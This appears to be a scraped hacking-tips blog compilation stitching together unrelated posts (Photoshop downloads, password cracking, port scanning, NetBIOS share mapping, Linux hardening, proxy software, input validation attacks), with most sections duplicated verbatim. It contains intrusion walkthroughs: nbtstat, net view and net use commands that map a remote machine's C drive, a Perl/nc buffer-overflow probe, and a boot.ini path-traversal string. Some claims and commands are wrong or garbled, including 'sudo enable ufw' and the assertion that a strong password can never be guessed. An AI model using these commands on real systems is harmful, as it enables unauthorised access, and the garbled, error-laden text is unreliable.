Modify it and insert the message you want to display each time Windows boots.
This can be effectively used to display the company's private policy each time the user logs on to his NT box.
It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."
Photoshop Tips and Tricks -
This compilation is the first in a series of Photoshop Tips and Tricks tutorials that have been featured in our WatchandLearnPhotoshop.com newsletter. This collection of Photoshop tutorials is a must have for any Photoshop enthusiast.
01 - 3D Reflection Effect (Running Time: 7:16)
This effect is identical to the effect shown in video 7, except that in this video, you’ll learn how to create a reflection for a 3-dimensional object.
02 - Censoring an Image (Running Time: 2:53)
If you’ve ever seen the televsion show “Cops”, you’ve seen video footage of someone being shoved into a police car with their faces censored out of the video. In this video, you’ll learn how to create a similar effect in Photoshop.
03 - Color Adjustment (Running Time: 4:14)
Got a photograph with colors that just don’t look quite right? In this video, you’ll learn how to bring out the colors that were supposed to be in your image to begin with.
04 - Creating a Wooden Frame (Running Time: 7:25)
As you may have guess, this tutorial teaches you how to create a wooden frame for your pictures in Photoshop.
05 - Glossy Reflection on Text (Running Time: 7:11)
In this video, Craig will show you how to create that glossy reflective effect that you see on so many logos and websites. This effect is very simple to accomplish, and it adds so much to your text and your graphics.
06 - Making Your Pictures Glow (Running Time: 3:35)
In this tutorial, you’ll learn a very simple method for adding a custom diffuse glow effect to your images in Photoshop.
07 - Gradual Focus Change (Running Time: 5:42)
In this video, Craig shows you how to add a little depth to your landscape photos by creating a gradual focus change, where the image gradually blurs as it moves towards the background.
08 - Creating Grassy Fields (Running Time: 9:42)
In this video tutorial, Craig will show you how to create a very realistic grassy field scene from scratch using Photoshop’s Filters and Brush Dynamics.
09 - Grunge Text Effect (Running Time: 6:01)
In this video, Craig will show you how to create a popular grunge text effect in Photoshop.
10 – Converting Your Photos to Ink Sketches (Running Time: 4:12)
The “sketch” filter has it’s limitations, so in this video, Craig shows you how to take a photograph and convert it into an ink sketch by hand.
11 - Creating Realistic Lightning (Running Time: 7:01)
t’s amazing what a few filters and adjustments can do in Photoshop. In this video, you’ll learn a few steps that will great a very realistic lightning effect.
12 - Ancient Map Effect (Running Time: 8:10)
Don’t worry! You won’t have to draw all the roads and boundaries yourself. In this tutorial, Craig will show you how to take a plain map and transform it into an amazing ancient map with wrinkles, tears, burns, and holes.
13 - Matching Color Between Photographs (Running Time: 4:29)
Often, when taking multiple photographs of a subject, you’ll find that the color is off in some of them. If this occurs, fear not! Craig will show you how to fix this problem with Photoshop’s color matching tools.
14 - Custom Motion Blur (Running Time: 4:44)
There’s only so much that the “motion blur” filter can do for you in Photoshop. In this video, Craig will show you how to create your own motion blur by hand.
15 - Panorama (Running Time: 10:16)
Ever wanted to piece a series of images together to make a panoramic shot? In this video, Craig will show you how to do so flawlessly, so that you can’t tell where one image ends and the next one begins.
16 - Perspective Cropping (Running Time: 2:31)
Taking a photograph of framed artwork can be a pain, especially if there’s a layer of glass in front of the art. Unless you have perfect lighting or a camera with manual controls, you’ll often end up with a bright flash covering up the art work. In this tutorial, you’ll learn how to use perspective cropping to get around this problem. (Warning: Don’t even take the picture until you view this tutorial.) .
17 - Blurring the Background of a Picture (Running Time: 6:09)
Sometimes you can really make a picture come alive by blurring out the background and keeping the foreground in focus. This video will teach you how to do just that.
18 - Creating a Planet (Running Time: 9:00)
In this video, you’ll learn how to create an amazingly realistic planet in just a few simple steps
19 - Plastic Text Effect (Running Time: 6:00)
This self-explanatory tip will teach you one of many methods used to create a 3-dimensional plastic texture for your text.
20 - Reflection Effect (Running Time: 14:22)
In this video, Craig will teach you a quick and easy way to create a reflection effect that gives your logo or graphic a little more depth and a lot more appeal.
http://hotfile.com/dl/10759271/205da6c/PStrtps.part1.rar.html
http://hotfile.com/dl/10759272/f81804b/PStrtps.part2.rar.html
01 - 3D Reflection Effect (Running Time: 7:16)
This effect is identical to the effect shown in video 7, except that in this video, you’ll learn how to create a reflection for a 3-dimensional object.
02 - Censoring an Image (Running Time: 2:53)
If you’ve ever seen the televsion show “Cops”, you’ve seen video footage of someone being shoved into a police car with their faces censored out of the video. In this video, you’ll learn how to create a similar effect in Photoshop.
03 - Color Adjustment (Running Time: 4:14)
Got a photograph with colors that just don’t look quite right? In this video, you’ll learn how to bring out the colors that were supposed to be in your image to begin with.
04 - Creating a Wooden Frame (Running Time: 7:25)
As you may have guess, this tutorial teaches you how to create a wooden frame for your pictures in Photoshop.
05 - Glossy Reflection on Text (Running Time: 7:11)
In this video, Craig will show you how to create that glossy reflective effect that you see on so many logos and websites. This effect is very simple to accomplish, and it adds so much to your text and your graphics.
06 - Making Your Pictures Glow (Running Time: 3:35)
In this tutorial, you’ll learn a very simple method for adding a custom diffuse glow effect to your images in Photoshop.
07 - Gradual Focus Change (Running Time: 5:42)
In this video, Craig shows you how to add a little depth to your landscape photos by creating a gradual focus change, where the image gradually blurs as it moves towards the background.
08 - Creating Grassy Fields (Running Time: 9:42)
In this video tutorial, Craig will show you how to create a very realistic grassy field scene from scratch using Photoshop’s Filters and Brush Dynamics.
09 - Grunge Text Effect (Running Time: 6:01)
In this video, Craig will show you how to create a popular grunge text effect in Photoshop.
10 – Converting Your Photos to Ink Sketches (Running Time: 4:12)
The “sketch” filter has it’s limitations, so in this video, Craig shows you how to take a photograph and convert it into an ink sketch by hand.
11 - Creating Realistic Lightning (Running Time: 7:01)
t’s amazing what a few filters and adjustments can do in Photoshop. In this video, you’ll learn a few steps that will great a very realistic lightning effect.
12 - Ancient Map Effect (Running Time: 8:10)
Don’t worry! You won’t have to draw all the roads and boundaries yourself. In this tutorial, Craig will show you how to take a plain map and transform it into an amazing ancient map with wrinkles, tears, burns, and holes.
13 - Matching Color Between Photographs (Running Time: 4:29)
Often, when taking multiple photographs of a subject, you’ll find that the color is off in some of them. If this occurs, fear not! Craig will show you how to fix this problem with Photoshop’s color matching tools.
14 - Custom Motion Blur (Running Time: 4:44)
There’s only so much that the “motion blur” filter can do for you in Photoshop. In this video, Craig will show you how to create your own motion blur by hand.
15 - Panorama (Running Time: 10:16)
Ever wanted to piece a series of images together to make a panoramic shot? In this video, Craig will show you how to do so flawlessly, so that you can’t tell where one image ends and the next one begins.
16 - Perspective Cropping (Running Time: 2:31)
Taking a photograph of framed artwork can be a pain, especially if there’s a layer of glass in front of the art. Unless you have perfect lighting or a camera with manual controls, you’ll often end up with a bright flash covering up the art work. In this tutorial, you’ll learn how to use perspective cropping to get around this problem. (Warning: Don’t even take the picture until you view this tutorial.) .
17 - Blurring the Background of a Picture (Running Time: 6:09)
Sometimes you can really make a picture come alive by blurring out the background and keeping the foreground in focus. This video will teach you how to do just that.
18 - Creating a Planet (Running Time: 9:00)
In this video, you’ll learn how to create an amazingly realistic planet in just a few simple steps
19 - Plastic Text Effect (Running Time: 6:00)
This self-explanatory tip will teach you one of many methods used to create a 3-dimensional plastic texture for your text.
20 - Reflection Effect (Running Time: 14:22)
In this video, Craig will teach you a quick and easy way to create a reflection effect that gives your logo or graphic a little more depth and a lot more appeal.
http://hotfile.com/dl/10759271/205da6c/PStrtps.part1.rar.html
http://hotfile.com/dl/10759272/f81804b/PStrtps.part2.rar.html
Password Hacking :-
Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :
1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.
2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....
In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.
Check Your Password Strength
3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.
4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.
It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.
Most passwords can be cracked by using following techniques :
1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.
2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....
In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.
Check Your Password Strength
3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.
4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.
It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.
Network Hacking (Port Scanning)
Port Scanning :- Port scanning is carried out to determine a list of open ports on the remote host that have certain services or daemons running. In port scanning, the attacker connects to various TCP and UDP ports and tries to determine which ports are in listening mode.
1) TCP Ports Scanning :- Almost all port scans are based on the client sending a packet containing a particular flag to the target port of the remote system to determine whether the port is open. Following table lists the type of flags a TCP packet header can contain.
Flag Meaning
URG (urgent) This flag tells the receiver that the data pointed at by the urgent pointer required urgently.
ACK (acknowledgment) This flag is turned on whenever sender wants to acknowledge the receipt of all data send by the receiving end.
PSH (push) The data must be passed on to the application as soon as possible.
RST (reset) There has been a problem with the connection and one wants to reset the connection with another.
SYN (synchronize) If system X wants to establish TCP connection with system Y, then it sends it's own sequence number to Y, requesting that a connection be established. Such apacket is known as synchronize sequence numbers or SYN packet.
FIN (finish) If system X has finished sending all data packets and wants to end the TCP/IP connection that it has established with Y, then it sends a packet with a FIN flag to system Y.
A typical TCP/IP three way handshake can be described as follows :
1) The client sends a SYN packet to the server.
2) The server replies with a SYN packet and acknowledges the client's SYN packet by sending an ACK packet.
3) The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are :-
1) TCP connect port scanning
2) TCP SYN scanning (half open scanning)
3) SYN/ACK scanning
4) TCP FIN scanning
5) TCP NULL scanning
6) TCP Xmas tree scanning
2) UDP Ports Scanning :- In UDP port scanning, aUDP packet is sent to each port on the target host one by one.
If the remote port is closed, then the server replies with a Port Unreachable ICMP error message. If the port is open then no such error message is generated.
3) FTP Bounce Port Scanning :- The FTP bounce port scanning technique was discovered by Hobbit. He revealed a very interesting loophole in the FTP protocol that allowed users connected to the FTP service of a particular system to connect to any port of another system. This loophole allows anonymous port scanning.
Recommended Tools
Nmap http://www.insecure.org/nmap
Superscan http://www.foundstone.com
1) TCP Ports Scanning :- Almost all port scans are based on the client sending a packet containing a particular flag to the target port of the remote system to determine whether the port is open. Following table lists the type of flags a TCP packet header can contain.
Flag Meaning
URG (urgent) This flag tells the receiver that the data pointed at by the urgent pointer required urgently.
ACK (acknowledgment) This flag is turned on whenever sender wants to acknowledge the receipt of all data send by the receiving end.
PSH (push) The data must be passed on to the application as soon as possible.
RST (reset) There has been a problem with the connection and one wants to reset the connection with another.
SYN (synchronize) If system X wants to establish TCP connection with system Y, then it sends it's own sequence number to Y, requesting that a connection be established. Such apacket is known as synchronize sequence numbers or SYN packet.
FIN (finish) If system X has finished sending all data packets and wants to end the TCP/IP connection that it has established with Y, then it sends a packet with a FIN flag to system Y.
A typical TCP/IP three way handshake can be described as follows :
1) The client sends a SYN packet to the server.
2) The server replies with a SYN packet and acknowledges the client's SYN packet by sending an ACK packet.
3) The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are :-
1) TCP connect port scanning
2) TCP SYN scanning (half open scanning)
3) SYN/ACK scanning
4) TCP FIN scanning
5) TCP NULL scanning
6) TCP Xmas tree scanning
2) UDP Ports Scanning :- In UDP port scanning, aUDP packet is sent to each port on the target host one by one.
If the remote port is closed, then the server replies with a Port Unreachable ICMP error message. If the port is open then no such error message is generated.
3) FTP Bounce Port Scanning :- The FTP bounce port scanning technique was discovered by Hobbit. He revealed a very interesting loophole in the FTP protocol that allowed users connected to the FTP service of a particular system to connect to any port of another system. This loophole allows anonymous port scanning.
Recommended Tools
Nmap http://www.insecure.org/nmap
Superscan http://www.foundstone.com
Network Hacking
Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.
Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com
example:- c:/>ping www.google.com
Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.
Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n
Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com
By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port
example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21
Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert www.insecure.in
Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.
various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.
The information obtained by using tracert command can be further used to find out exact operating system running on target system.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.
Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com
example:- c:/>ping www.google.com
Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.
Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n
Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com
By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port
example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21
Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert www.insecure.in
Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.
various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.
The information obtained by using tracert command can be further used to find out exact operating system running on target system.
-: NetBIOS Hacking :-
NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!
The NBTSTAT Command :-
NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command and their usage can be viewed.
At the command prompt type-
C:\Windows>nbtstat
Sample NBTSTAT Response :-
C:\>nbtstat -A 117.200.160.174
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------
PRASANNA <00> UNIQUE Registered
INSECURE LABS <00> GROUP Registered
PRASANNA <03> UNIQUE Registered
PRASANNA <20> UNIQUE Registered
INSECURE LABS <1E> GROUP Registered
MAC Address = 86-95-55-50-00-00
An intruder could use the output from an nbtstat against your machines to begin gathering information about them.
"<03> in above table is nothing but the username of that system."
The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.
Here is an example of the Net View command-
C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174
Sharename Type Comment
----------------------------------------
C Disk Drive C:\
MySofts Disk My Softwares Collection
E Disk Drive E:\
The command was completed successfully.
This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!
C:\>net use G: \\117.200.160.174\C
The command was completed successfully.
C:\>G:
G:\>
It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!
The NBTSTAT Command :-
NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command and their usage can be viewed.
At the command prompt type-
C:\Windows>nbtstat
Sample NBTSTAT Response :-
C:\>nbtstat -A 117.200.160.174
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------
PRASANNA <00> UNIQUE Registered
INSECURE LABS <00> GROUP Registered
PRASANNA <03> UNIQUE Registered
PRASANNA <20> UNIQUE Registered
INSECURE LABS <1E> GROUP Registered
MAC Address = 86-95-55-50-00-00
An intruder could use the output from an nbtstat against your machines to begin gathering information about them.
"<03> in above table is nothing but the username of that system."
The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.
Here is an example of the Net View command-
C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174
Sharename Type Comment
----------------------------------------
C Disk Drive C:\
MySofts Disk My Softwares Collection
E Disk Drive E:\
The command was completed successfully.
This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!
C:\>net use G: \\117.200.160.174\C
The command was completed successfully.
C:\>G:
G:\>
Linux security
1) Firewalls are your guardian angels.
First of all, keep a software firewall active on your system, and restrict access to ports that allow remote access into your system, a good idea is to allow only a few select hosts access to ports used by services such as ssh (port 22) or telnet (port 23). Keeping a firewall in place ensures that you alone dictate who gets to access remote services on your computer and who doesn’t. To set up a firewall in linux, you can use the iptables program which comes standard with most linux distributions. However, iptables is quite difficult and complicated to set up correctly, and you will need to spend some time fiddling with the command line, but it is very flexible and powerful once configured correctly.
If messing about with iptables dosen’t appeal to you, there are frontends to iptables that you can use to set up effective firewalls. One such frontend is ufw (uncomplicated firewall) this program comes standard on ubuntu and is quite simple to set up, to use it you first have to enable it by typing in ’sudo enable ufw’ in the terminal, once the ufw service is active, adding rules is as simple as ’sudo allow 22/tcp’ > this statement allows all tcp traffic on port 22, swap allow for deny and you have the ssh service blocked, Its that simple, much easier than mucking about with iptables.
Of course, there are many people who do not like the idea of using command-line programs and like all their apps to be graphical. If you prefer a GUI configured firewall, then firestarter is the choice for you. Firestarter is a breeze to use, and has good documentation available on the firestarter website.
2) Passwords are for your protection, choose them well
Choose good user passwords, especially for root. One way to choose a secure password is to take a sentence, reduce it to an acronym and then replace some letters of the acronym with symbols and add some numbers to it. this mixing of alphabets, numbers and symbols, along with its long length will be a strong password.
Never use actual words that have meaning as passwords. These types of passwords are weak and can be cracked using dictionary attacks. Also along those lines: Never use words that hold personal significance with you.. i.e don’t use passwords that people who know you will be inclined to think that you would use, like a favorite pet’s name.. etc.
And for god’s sake, don’t use the word ‘password’ as a password…. ( don’t laugh… thats one of the most common passwords .. )
3) Use antivirus
Yeaps you read right.. antivirus. Antivirus on linux you say? Yes, linux has antivirus suites as well , but this is more for cleaning off your thumbdrives that you may have used in an infected windows machine than for killing linux viruses, as the system of user permissions for executing files makes linux a very inhospitable place for computer viruses to live. clamAV is a good antivirus choice, with a GUI version available for most major distros.
4) Be careful what scripts you get off the net
Getting bash scripts off the net is convenient, but be careful what scripts you run on your system, and make sure you check them out first. If you suspect that a script you got has some nasty intentions behind it, but you do not have the expertise in bash scripting to be sure, post the script in text form on linux support forums and the community will help you out. Unfortunatly, there are idiots out there who write destructive shell scripts and release them into the wilds of the internet, in this case intuition is your best defence.
5) Encrypt sensitive data that you may have.
The concept behind encryption is relatively simple, make the data to be encrypted unreadable to anybody besides authorised users.
My favourite program for encrypting data on linux AND windows would have to be truecrypt. Truecrypt works by creating a virtual volume which you can then set a passphrase or security key to. When you mount the virtual volume, you can then add files to it, which will be totally encrypted and unviewable once unmounted. The only way to mount the drive is to supply the passphrase or key.
6)Keep your BIOS set to boot from your harddrive and then add a password to your bios.
This is to keep people from booting off from live CDs and cracking your password from them. Although it is relatively easy to reset the BIOS password, this should be at least a minor detterance to those who may try this cracking method.
Well, there you go.. hopefully you wil use these tips and make your system a safer box to work on.
First of all, keep a software firewall active on your system, and restrict access to ports that allow remote access into your system, a good idea is to allow only a few select hosts access to ports used by services such as ssh (port 22) or telnet (port 23). Keeping a firewall in place ensures that you alone dictate who gets to access remote services on your computer and who doesn’t. To set up a firewall in linux, you can use the iptables program which comes standard with most linux distributions. However, iptables is quite difficult and complicated to set up correctly, and you will need to spend some time fiddling with the command line, but it is very flexible and powerful once configured correctly.
If messing about with iptables dosen’t appeal to you, there are frontends to iptables that you can use to set up effective firewalls. One such frontend is ufw (uncomplicated firewall) this program comes standard on ubuntu and is quite simple to set up, to use it you first have to enable it by typing in ’sudo enable ufw’ in the terminal, once the ufw service is active, adding rules is as simple as ’sudo allow 22/tcp’ > this statement allows all tcp traffic on port 22, swap allow for deny and you have the ssh service blocked, Its that simple, much easier than mucking about with iptables.
Of course, there are many people who do not like the idea of using command-line programs and like all their apps to be graphical. If you prefer a GUI configured firewall, then firestarter is the choice for you. Firestarter is a breeze to use, and has good documentation available on the firestarter website.
2) Passwords are for your protection, choose them well
Choose good user passwords, especially for root. One way to choose a secure password is to take a sentence, reduce it to an acronym and then replace some letters of the acronym with symbols and add some numbers to it. this mixing of alphabets, numbers and symbols, along with its long length will be a strong password.
Never use actual words that have meaning as passwords. These types of passwords are weak and can be cracked using dictionary attacks. Also along those lines: Never use words that hold personal significance with you.. i.e don’t use passwords that people who know you will be inclined to think that you would use, like a favorite pet’s name.. etc.
And for god’s sake, don’t use the word ‘password’ as a password…. ( don’t laugh… thats one of the most common passwords .. )
3) Use antivirus
Yeaps you read right.. antivirus. Antivirus on linux you say? Yes, linux has antivirus suites as well , but this is more for cleaning off your thumbdrives that you may have used in an infected windows machine than for killing linux viruses, as the system of user permissions for executing files makes linux a very inhospitable place for computer viruses to live. clamAV is a good antivirus choice, with a GUI version available for most major distros.
4) Be careful what scripts you get off the net
Getting bash scripts off the net is convenient, but be careful what scripts you run on your system, and make sure you check them out first. If you suspect that a script you got has some nasty intentions behind it, but you do not have the expertise in bash scripting to be sure, post the script in text form on linux support forums and the community will help you out. Unfortunatly, there are idiots out there who write destructive shell scripts and release them into the wilds of the internet, in this case intuition is your best defence.
5) Encrypt sensitive data that you may have.
The concept behind encryption is relatively simple, make the data to be encrypted unreadable to anybody besides authorised users.
My favourite program for encrypting data on linux AND windows would have to be truecrypt. Truecrypt works by creating a virtual volume which you can then set a passphrase or security key to. When you mount the virtual volume, you can then add files to it, which will be totally encrypted and unviewable once unmounted. The only way to mount the drive is to supply the passphrase or key.
6)Keep your BIOS set to boot from your harddrive and then add a password to your bios.
This is to keep people from booting off from live CDs and cracking your password from them. Although it is relatively easy to reset the BIOS password, this should be at least a minor detterance to those who may try this cracking method.
Well, there you go.. hopefully you wil use these tips and make your system a safer box to work on.
Invisible Browsing v7.0 - Hide your IP address
Invisible Browsing suits both less experienced users and advanced users, through his manual or automatic mode. The manual mode allows you make all the settings, to choose the proxy and test it, while in the automatic mode all you have to do is a simple click on the button and you will surf anonymously. Invisible Browsing will hide, change or mask your IP address, letting you surf anonymously preventing your IP or other information to be collected without your permission. Invisible Browsing allows you to change your IP anytime by routing your Internet traffic through overseas servers.
All proxies are tested in advanced providing a high speed anonymous Internet connection. Premium proxies are high quality proxies that will never slow down your Internet connection. Proxies followed by the tag "supports POST" allow dynamic Internet browsing and posting messages on various forums, message boards or vote in polls. Invisible Browsing is an efficient Internet Explorer Privacy Solution erasing automatically and in real time, all your online tracks.
Invisible Browsing will hide, change or mask your IP address preventing others or any website from logging your internet address without your permission.
System Requirements
Win 98/Me/2000/XP/2003/Vista
Mediafire || Rapidshare
----------------o0o----------------
All proxies are tested in advanced providing a high speed anonymous Internet connection. Premium proxies are high quality proxies that will never slow down your Internet connection. Proxies followed by the tag "supports POST" allow dynamic Internet browsing and posting messages on various forums, message boards or vote in polls. Invisible Browsing is an efficient Internet Explorer Privacy Solution erasing automatically and in real time, all your online tracks.
Invisible Browsing will hide, change or mask your IP address preventing others or any website from logging your internet address without your permission.
System Requirements
Win 98/Me/2000/XP/2003/Vista
Mediafire || Rapidshare
----------------o0o----------------
Input Validation Attacks :-
Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.
The most common input validation attacks are as follows-
1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.
Here’s the buffer test, calling on Perl from the command line:
$ echo –e “GET /login.php?user=\
> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \
nc –vv website 80
This sends a string of 500 “a” characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.
2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-
/menu.asp?dimlDisplayer=menu.asp
/webacc?User.asp=login.htt
/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
/Getfile.asp?/scripts/Client/login.js
/includes/printable.asp?Link=customers/overview.htm
